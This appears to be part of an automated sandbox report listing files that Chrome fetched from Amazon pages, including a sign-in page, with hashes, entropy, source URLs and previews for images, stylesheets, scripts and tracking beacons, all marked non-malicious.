                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`...............................s..Q..6.Ram..p..........1..i ....9.gO....l..f.g^F..n..].g.U..Y.o.}....k.........8O.s..m$..E...m..e.u.U.V...........9>UR.....y...i..,m.....=.....=...5/f.4i.X...s..G......rkoI.k......'W.ZHZ.....;..'|.6..P..Fy..qT.^..$.<..Pf.L..\.....47M>W....k..O=.l.tO%+N.P...a.{.....n~..pS..u3..4.c.-.Vg.7.P.3..Z.R..7R.._...\..;s>K!.r.m.G..;.:l..aS]..I.&;.k...9.3...U.w..\.....D.......a..e...k...A.w#..77.B..-{.....k].68C.0..4.|.|...Cg...."..%....s.^..B..G...+.........w3..;4.[\Z..3..L&p9~.m}:h...C;..g=.....5 .j...|..u....m=IcS(....<.<.r.xW..$..1R7.E.;.0..Mgp)..7....]........l..:.6d..5_.du...{f...q.t&...\.....?|.$.2<U...WE..&Y*.=.?>i#.....^.S)..|.1[.....+.u..u..:.D.e....<.s9y......<.....;.{.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):136113
                                                                                                                                                                                                                                                                Entropy (8bit):5.029096452511242
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:JHqjC0oOo3pouSXmkglKEKajAQlkEXZKF4R8JA5El12ef1LL:JHqjC0oNgLL
                                                                                                                                                                                                                                                                MD5:B037CE89F289D2AE00FC5F27A533FB30
                                                                                                                                                                                                                                                                SHA1:6CAB1C574B2C2544EB3F32F7AED023F442A61C75
                                                                                                                                                                                                                                                                SHA-256:65E3BA66DF0C9C45A17AC62283069D21D5E4A473D649A1D574A562A44F9A09C3
                                                                                                                                                                                                                                                                SHA-512:949FAB51819FBEBF8F00382CF5F529D10BDD0DA703B72EEBF03737C7A94D523B90B4A9F6257154A5EED9E84B476D6B9494E9DFCC800EE163C90C8B76BC4FA1B8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61A6IErPNXL._RC%7C11Fd9tJOdtL.css,11tfezETfFL.css,31Q3id-QR0L.css,31U9HrBLKmL.css_.css?AUIClients/AmazonUI"
                                                                                                                                                                                                                                                                Preview:*{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}body{min-height:100%}article,aside,details,figcaption,figure,footer,header,hgroup,nav,section{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none}html{font-size:100%;-webkit-text-size-adjust:100%}pre{margin:0}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:active,a:hover{outline:0}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}abbr{border-bottom:0 none}img{max-width:100%;border:0}button,input,select,textarea{margin:0;font-size:100%;vertical-align:middle}button,input{line-height:normal}button::-moz-focus-inner,input::-moz-focus-inner{padding:0;border:0}button,input[type=button],input[type=reset],input[type=submit]{cursor:pointer;-webkit-appearance:button}input[type=search]{-webkit-appearance:textfield}input[type=search]::-webkit-search-cancel-button,input[type=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?rid=99EW8DTCPK04PDBCDQEK&sid=262-5692979-3003613&rx=zeSr6zbHsQh3b0mOv5A96g
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?rid=JZJKZTDKNV2CKC82BW2M&sid=262-5692979-3003613&rx=SPPeXkci7lEOP5VWs8LQwA
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3683
                                                                                                                                                                                                                                                                Entropy (8bit):7.885143961741562
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tu95NlWq9w4RbZluU6BUlTpUIFSK+6vzja:C95NIq9wOUU6OlXx+szW
                                                                                                                                                                                                                                                                MD5:5D696105C36B598568169C5C4B725C64
                                                                                                                                                                                                                                                                SHA1:0C7129A666167A62B944445F5C702952353A9303
                                                                                                                                                                                                                                                                SHA-256:241AF2152C537513CB097AA493D36E1D764011E35C28C5D35FA15B1B7530A7C2
                                                                                                                                                                                                                                                                SHA-512:0EE2CEAF6A6F5C79729A115F9F8D44FB6C4D7E8FBAD5407B109F6FED1E3FBCEBADB8EA3F63781AF71EAD3D788200DB9DB961A9F33938C6DF54550E8CA44A9841
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b09774kt11_379x304_ae-en._SY116_CB623005781_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aa2Q.q..#%3brt.......s....BT.......................................................1!.."aq..Q..23AR.............?...R.%.)J.JR.R....(.)X.^l$G...\.."i.E.7....C......Pr..s.D.+\G. .$.\{oy.?...u..,....T,1.Snv..#<.Ac..A..Kw>h.u.2...C.F.......=C..H...i..)JP.JR.R....(.)J.JR.R..9..\....~'....Fn..un.W.~...P..Y-.U..J...m<...:jW........J.....Rv.69.?.......),q=.....~......:l.JFp2.`{...*...Kna.A...__..(U.Hoa...0%@p.1.~k......A........Ve..t.._..([vQ.JR..R......+.c#wo_S.\....)Z...s....[k{.ayd1.-...bQ:.>U..u..;_.F.?.*7..j.Z....14x.k.ob. ...5.o.._.^?.u=].5..'..#$a6............c.JU.2......$.H1...I;.........xr..r.#.:.......a.W:.3.+.m.-,R@...pU..qT....}M....k.pyK.F...3/.$.`G...!.[....dx......)...z6....~.Z][...eS.c....U".......,.\'.......7C.0@$z.Vu`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10336
                                                                                                                                                                                                                                                                Entropy (8bit):7.848664680730424
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:KkxkREgVsNrvh9TQ9TBM8nZiWoHWSvLzeuSBiGWN:KOCSlvrTQ9T28ZQLz3SA7N
                                                                                                                                                                                                                                                                MD5:A3A0930DDA8271F571B88E239CB7CF1B
                                                                                                                                                                                                                                                                SHA1:115B01E385719E1DEFD2E470733B93F0BDBA4EA9
                                                                                                                                                                                                                                                                SHA-256:2D8783DBE7D514162567F529B1F916172F7DDE1CCC7A3C95C15A4C06503E92FC
                                                                                                                                                                                                                                                                SHA-512:C83EB5146F2A5A51B8EA98602A51E41354AAF92233429856BA68B5A172A65C25C7A61847E48C4A1D1F07CFC31F7250EDFC26367C5648638FEA09D4A33F2E70B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31Lxe89wp8L._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................X.......................................................................p'Z...j-G.. ..&.I......*......./?.A..=......>.@..?N..G{. w.....E..tX._..=.._....W|.........I....nW......f.u.}......,."Z....5.MlT..5....>.$....YI.\..[_.z.....[S.........6}L...3...:v).@...|...N...k.6.Ws.w....W.S..P....Z;1D..x.S..(..q|....G.c..6.W.....}3....j.o.7.~...h.^..........[i..7M.v..`2.b..y..>}...+.z8..-N..x.{...~J..B..&.W".8.D...&..R.O...<^v......s6..mwN..w....t.?z...G...............4..I<....Z2...*vi._....r..g..Q.......l~....*.a..z..0.4.J;..v.?.n..{.......J..]!...X...K...U...e.~.............'v.O=.%{F_0.eRz...D...<....2g.J.o.n..^..R..U..8...(.r4..Q4..N..~....~.x.....W....R.[.f.z._.:g.:..~k.............'v.O;V....?12.=S_.<...xg......zy....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (868)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):45047
                                                                                                                                                                                                                                                                Entropy (8bit):5.6295063775589975
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:93gH7LGLsefSvvGeH7uRcWxcxoxXkDIIxrxtiXxq:KIsef+ixcxox0UIxrxyxq
                                                                                                                                                                                                                                                                MD5:0609C804B4AF3A5B7AAF2625FA534FAB
                                                                                                                                                                                                                                                                SHA1:C38C215156EF69FD048740BC5204E69D211068DB
                                                                                                                                                                                                                                                                SHA-256:1017F870F22A6E6263DEDD0BE6D31FCC6DB9762F9540EAF31EE827B710A76D7B
                                                                                                                                                                                                                                                                SHA-512:D6F316E751509E9CE01ECA64AF78473D87FC2E70F3B3F027A222D812FF1CF67585ABEB5B73534A388D4FEBB392667AC203A6F0832EE6E19325BCDC4D633A4B27
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/01B3Yme5dLL._RC%7C01j5DeZSMzL.js,51M-SaPaAgL.js_.js?AUIClients/ALMCartActionAssets&X7ecmQ3Q"
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ALMSavingsAssets@core","ALMSavings"):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ConsumablesATCActionAssets",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(e){var g=window.AmazonUIPageJS||window.P,n=g._namespace||g.attributeErrors,q=n?n("ALMCartActionAssets",""):g;q.guardFatal?q.guardFatal(e)(q,window):q.execute(function(){e(q,window)})})(function(e,g,n){function q(c,b){try{e.register(c,b)}catch(d){if(!d.message.includes("reregistered by ALMCartActionAssets"))throw d;}}function E(){var c=arguments;return{register:function(b,d){try{e.when.apply(e,c).register(b,d)}catch(a){if(!a.message.includes("reregistered by ALMCartActionAssets"))throw a;.}}}}e.when("ALMCar
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 141x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6693
                                                                                                                                                                                                                                                                Entropy (8bit):7.944925187071744
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:bjxgm5d9tr09bqWLc19oc2RKZeQqE0UXgq:bem1tr09W2c19otIHqq
                                                                                                                                                                                                                                                                MD5:ED9382343C564575819BC952993E64DA
                                                                                                                                                                                                                                                                SHA1:5ED9D38BF98AB2B0F84005B5AB57D38F52297167
                                                                                                                                                                                                                                                                SHA-256:58A97A6756237D904045CF9ACAE25AC1DF5BFF343F35FB3034EB403923006B1B
                                                                                                                                                                                                                                                                SHA-512:6825FFBFBB00F30DFB75E52932CD2478AED3A50BCFF510A3FC28A0ACA17034C6D13A1B92AB37C948914583B1AFAFE457C785939ED64D5364D7C3ED86DE03185B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61Maf8rwu-L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!R..."1V.......#Qa2AB$3bdqr.................................................!1QA......"2Raq.....b..............?..Lg.jt._M..Dk..>..`.T.EX.FF..;....5q.[2.V!....-..5.4%.B.Z....-5%.S..D....h..:..C..s.4.5.kT.2js..k.=.....wd.....xv...V.\...o..=.&1."c../1........_.N...z..9.."o).I.!.&wd]!.-V.KO.........V.+.~.(l......pn.....{../.t.........R.&.e...m0m.M..1b7.F.4'....6.."..Z15rN.....!$BH*....1k..M..!...o.{..b._.WM..O...m.z(..r.C..\........?.-[._....=.j.j..N..2....].[.*.:A...gwiU'T...;8.6b.w...} ..^.2W].I.$X....Be...V.W.u?..hZ......^../a}7.?...........e;..V.W.u?..hZ.......j.../a]7.?...........e;..W.W.u?..hZ......KR.._M..O..../..t..C.YN.B.....O.c.......c........:S....{..)...VS...5..S........:....j.>..Y.t.SR..U..\...T3L..\ K...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1994)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3857
                                                                                                                                                                                                                                                                Entropy (8bit):5.025490419210117
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:ZOW9K93Ye93YXOV8OV693YmOVgOV693YGOPOrODz93YkODz93Y/OWODz93YoBCoN:ZOWQNYeNYXOV8OV6NYmOVgOV6NYGOPOZ
                                                                                                                                                                                                                                                                MD5:C94EC8544D1C0AD138328C6662A94F55
                                                                                                                                                                                                                                                                SHA1:757521F39E78FC59C8F2BE7318143DCDA904C0D4
                                                                                                                                                                                                                                                                SHA-256:BBAB353044CF5613F41E04BB659C16C06BA56B1F549E12B43B1ED555284AA6BD
                                                                                                                                                                                                                                                                SHA-512:44C6195CBCB65E1F3A1543E12E45C385BB9795241BF65FCA8C087F9B6DD9872EA322574436D36604A3C96D1011BA6FEAC2704DA63712C647F95E2134D3CF84F4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/11Q6G8iTFZL.css?xcp
                                                                                                                                                                                                                                                                Preview:._cropped-image-map_style_cropped-image-map__3oVAB{height:600px}._cropped-image-map_style_fluid-image-map-container__3GBMh{height:100%;overflow:hidden;position:relative;width:100%}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{height:100%;left:-9999px;margin:auto;max-width:none;position:absolute;right:-9999px;width:1500px}._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu img{height:100%}@media (max-width:767px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:368px}._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA ._cropped-image-map_style_fluid-image-map-container__3GBMh ._cropped-image-map_style_image-map__12oiu{width:919px}}@media (min-width:768px) and (max-width:919px){._cropped-image-map_style_cropped-image-map__3oVAB._cropped-image-map_style_tablet-app__2ZlzA{height:470px}._croppe
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4236
                                                                                                                                                                                                                                                                Entropy (8bit):7.747014918570356
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T9UGRvK6igJq1blMg11yEgjMsS4NSg+6M025a047QdS16o:CGJHXqIw1iS8SgrM025a3sdFo
                                                                                                                                                                                                                                                                MD5:6F95F0BB13C080E7712373FCC50B3AAF
                                                                                                                                                                                                                                                                SHA1:BEAA3C973E3AC0E99BDE0F9284A606021F6E37E1
                                                                                                                                                                                                                                                                SHA-256:809D3CA7133244C311D4055EA16325EBDBA50CCFA5D1ABD5C103F8C0E3692EDF
                                                                                                                                                                                                                                                                SHA-512:9F116C5A5D818A38292434705101152A58B6DB0E4C57D8E0831AA9F2104BE6B0277879FD6A1A04FD416A133AB9C29FCE7A0CAE5FFE4C62908DCB07D8A8CD47A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4................................................................................<..G......fa..........?Z...PRv..b/.5.~~....d...o...nn:.`..|.g..M$.._.VZ|.....WkP..&..2..t...Z.....UZ=|]...L.".n%...g+.mZ..............Mx.].H.{....S.h.~>.Oc.T[.$.....W...Z.5..........C...D2..k.3.......y.V7...l..i.(.R.[...........>...I..E.4..?C...r$<.~.O..5...[X.,..S........6...k...X.]..v.w..p'Z7..\.]y.?._.?Sc....S..........&.D*{Z..V..G..?z.........~....'.....Nn.....k.k............F9..u.[s.}._l..T.jUv.=@.......1...=!...F'.......?q.......z.:.m,........4.....\.,b{UJ.~0.&.WJkbs.|..6.l..s.=......................................................... 0134.!"..2B#.$A`p............brf[..En....,..o.....|..-.L.............h.6.Bh.Kf._..I..X.G...q..R6..Z....Q.......=F.^f.16.K...H...U.rX.0-L.\..5G.L....)
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:2T6Z4AC3VMBGX01C1EVN$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3D2T6Z4AC3VMBGX01C1EVN%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D7460%26at%3D7460%26t%3D1723469074826%26csmtags%3DstartVL%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3D2T6Z4AC3VMBGX01C1EVN%26aftb%3D1%26lob%3D0:7460
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DM6RE43WFQNSF80R5MH23%26ue%3D4%26bb%3D77%26ns%3D148%26ne%3D229%26be%3D336%26fp%3D195%26fcp%3D195%26pc%3D1057%26tc%3D-1036%26na_%3D-1036%26ul_%3D-1723469063936%26_ul%3D-1723469063936%26rd_%3D-1723469063936%26_rd%3D-1723469063936%26fe_%3D-1034%26lk_%3D-1008%26_lk%3D-1008%26co_%3D-1008%26_co%3D-277%26sc_%3D-1007%26rq_%3D-277%26rs_%3D-36%26_rs%3D320%26dl_%3D-30%26di_%3D368%26de_%3D369%26_de%3D375%26_dc%3D1056%26ld_%3D1056%26_ld%3D-1723469063936%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D3%26hoe%3D4%26ld%3D1057%26t%3D1723469064993%26ctb%3D1%26rt%3D__ld%3A11-4-2-3-3-7-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsActive%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Ccsm-feature-touch-enabled%3Afalse%26viz%3Dvisible%3A4%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:1058
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2043%26pc%3D4843%26at%3D4843%26t%3D1723469068779%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4844
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:M6RE43WFQNSF80R5MH23$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DM6RE43WFQNSF80R5MH23%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D327%26pc%3D4843%26at%3D4843%26t%3D1723469068779%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DM6RE43WFQNSF80R5MH23%26aftb%3D1%26lob%3D1:4843
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
